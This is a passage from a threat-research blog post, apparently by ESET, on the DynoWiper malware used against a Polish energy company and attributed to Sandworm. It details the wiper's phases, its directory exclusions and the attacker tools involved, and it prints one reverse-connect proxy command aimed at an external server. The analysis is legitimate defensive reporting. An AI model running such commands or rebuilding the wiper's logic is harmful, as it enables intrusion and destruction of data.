In this blog post, we provide more technical details related to our previous DynoWiper publication. Key points of the report: ESET researchers identified new data-wiping malware that we have named DynoWiper, used against an energy company in Poland. The tactics, techniques, and procedures (TTPs) observed during the DynoWiper incident closely resemble those seen earlier this year in an incident involving the ZOV wiper in Ukraine: Z, O, and V are Russian military symbols. We attribute DynoWiper to Sandworm with medium confidence, in contrast to the ZOV wiper, which we attribute to Sandworm with high confidence. Sandworm profile Sandworm is a Russia-aligned threat group that performs destructive attacks. It is mostly known for its attacks against Ukrainian energy companies in 2015-12 and 2016-12, which resulted in power outages. In 2017-06 Sandworm launched the NotPetya data-wiping attack that used a supply-chain vector by compromising the Ukrainian accounting software M.E.Doc . In 2018-02, Sandworm launched the Olympic Destroyer data-wiping attack against organizers of the 2018 Winter Olympics in Pyeongchang. The Sandworm group uses such advanced malware as Industroyer , which is able to communicate with equipment at energy companies via industrial control protocols. In 2022-04, CERT-UA thwarted an attack against an energy company in Ukraine where the Sandworm group tried to deploy a new variant of this malware, Industroyer2 . In 2020-10, the US Department of Justice published an indictment against six Russian computer hackers that it alleges prepared and conducted various Sandworm attacks. The group is commonly attributed to Unit 74455 of the Russian Main Intelligence Directorate (GRU). History of Sandworm’s destructive operations Sandworm is a threat actor known for conducting destructive cyberattacks, targeting a wide range of entities including government agencies, logistics companies, transportation firms, energy providers, media organizations, grain sector companies, and telecommunications companies. These attacks typically involve the deployment of wiper malware – malicious software designed to delete files, erase data, and render systems unbootable. Its operators have a long history of conducting such cyberattacks, and we have documented their activity extensively . In this blogpost, we focus on their recent operations involving data-wiping malware. To evade detections by security products, Sandworm often modifies the destructive malware it deploys – sometimes by introducing minor changes or by generating newly compiled variants from the original source code, and other times by abandoning a particular wiper altogether and switching to an entirely new malware family for its operations. We rarely see Sandworm attempt to deploy a destructive malware sample that was used in an earlier attack (for example, one with a known hash) or one that is already detected at the time of deployment. Since February 2022, we have been thoroughly tracking incidents involving destructive malware and have publicly documented our findings in reports such as A year of wiper attacks in Ukraine . Over the years, Sandworm has deployed a wide range of destructive malware families, including, in roughly chronological order, HermeticWiper , HermeticRansom , CaddyWiper , DoubleZero , ARGUEPATCH , ORCSHRED , SOLOSHRED , AWFULSHRED , Prestige ransomware , RansomBoggs ransomware , SDelete-based wipers , BidSwipe , ROARBAT , SwiftSlicer , NikoWiper , SharpNikoWiper , ZEROLOT , Sting wiper , and ZOV wiper. It should be noted that some of these malware families were deployed multiple times across a number of incidents. In 2025, ESET investigated more than 10 incidents involving destructive malware attributed to Sandworm, almost all of them occurring in Ukraine. We continuously enhance our products to improve early detection of Sandworm operations – ideally identifying activity before destructive wipers are deployed, and whenever possible preventing damage even when previously unknown destructive malware is executed. Because the majority of Sandworm’s cyberattacks currently target Ukraine, we collaborate closely with our Ukrainian partners, including the Computer Emergency Response Team of Ukraine ( CERT-UA ), to support both prevention and remediation efforts. Besides Ukraine, Sandworm has a decade-long history of targeting companies in Poland, including those in the energy sector. Typically, these operations have been conducted covertly for cyberespionage purposes, as seen in the BlackEnergy and GreyEnergy cases. Notably, we detected the first deployment of GreyEnergy malware at a Polish energy company back in 2015. However, since the start of Russia’s full-scale invasion of Ukraine, Sandworm has changed its tactics regarding targets in Poland. Specifically, in October 2022, it carried out a destructive attack against logistics companies in both Ukraine and Poland, disguising the operation as a Prestige ransomware incident. Microsoft Threat Intelligence reported on the Prestige ransomware incidents, which they attributed to Seashell Blizzard (aka Sandworm). At ESET, we detected the Prestige ransomware family and publicly attributed this activity to Sandworm. In December 2025, we detected the deployment of a destructive malware sample, which we named DynoWiper , at an energy company in Poland. The installed EDR/XDR product, ESET PROTECT, blocked execution of the wiper, significantly limiting its impact in the environment. In this blogpost, we reveal additional details about this activity and outline our attribution process. CERT Polska did an excellent job investigating the incident and published a detailed analysis in a report available on its website. DynoWiper On December 29 th , 2025, DynoWiper samples were deployed to the C:\inetpub\pub\ directory, which is likely a shared directory in the victim’s domain, with the following filenames: schtask.exe , schtask2.exe , and <redacted>_update.exe . The schtask*.exe samples contain the PDB path C:\Users\vagrant\Documents\Visual Studio 2013\Projects\Source\Release\Source.pdb . The username vagrant corresponds to a tool called Vagrant , which can be used to manage virtual machines. This suggests that the machine that was used to build the wiper is a Vagrant box or, more likely, a host system that manages virtual machines using Vagrant. It is therefore possible that Sandworm operators first tested the operation on virtual machines before deploying the malware in the target organization. The attackers initially deployed <redacted>_update.exe (PE timestamp: 2025‑12‑26 13:51:11). When this attempt failed, they modified the wiper code, built it, and then deployed schtask.exe (PE timestamp: 2025‑12‑29 13:17:06). This attempt also seems to have been unsuccessful, so they rebuilt the wiper with slightly modified code, resulting in schtask2.exe (PE timestamp: 2025‑12‑29 14:10:07). It is likely that even this final attempt failed. All three samples were deployed on the same day – December 29 th , 2025. ESET PROTECT was installed on the targeted machines and appears to have interfered with the execution of all three variants. DynoWiper’s workflow can be divided into three distinct phases, which are described later in the text. The schtask*.exe samples include only the first two phases and introduce a five-second delay between them. In contrast, <redacted>_update.exe implements all three phases and does not include the five-second delay. The wiper overwrites files using a 16-byte buffer that contains random data generated once at the start of the wiper’s execution. Files of size 16 bytes or fewer are fully overwritten, with smaller files being extended to 16 bytes. To speed up the destruction process, other files (larger than 16 bytes) have only some parts of their contents overwritten. During the first phase, the malware recursively wipes files on all removable and fixed drives, excluding specific directories (using case-insensitive comparison): system32 windows program files program files(x86) (a space is missing before the open bracket) temp recycle.bin $recycle.bin boot perflogs appdata documents and settings For <redacted>_update.exe and schtask.exe , the second phase behaves similarly, but this time the previously excluded directories are not skipped in the root directory (e.g., C:\ ). As a result, a path like C:\Windows is no longer excluded, while C:\Windows\System32 still is. For schtask2.exe , in the second phase, all files and directories on removable and fixed drives are removed via the DeleteFileW API without skipping any directories, and without overwriting files. The third phase forces the system to reboot, completing the destruction of the system. Unlike Industroyer and Industroyer2 , the discovered DynoWiper samples focus solely on the IT environment, with no observed functionality targeting OT ( operational technology ) industrial components. However, this does not exclude the possibility that such capabilities were present elsewhere in the attack chain. Other tools deployed We identified additional tools used within the same network prior to deployment of the wiper. In early stages of the attack, attackers attempted to download the publicly available Rubeus tool. The following path was used: c:\users\<USERNAME>\downloads\rubeus.exe . In early December 2025, attackers attempted to dump the LSASS process using Windows Task Manager. Additionally, they tried to download and launch a publicly available SOCKS5 proxy tool called rsocx . The attackers attempted to execute this proxy in reverse-connect mode using the command line C:\Users\<USERNAME>\Downloads\r.exe -r 31.172.71[.]5:8008 . This server is used by ProGame ( progamevl[.]ru ), a programming school for kids in Vladivostok, Russia, and was likely compromised. ZOV wiper We identified several similarities to previously known destructive malware, specifically to the wiper we have named ZOV, which we attribute to Sandworm with high confidenc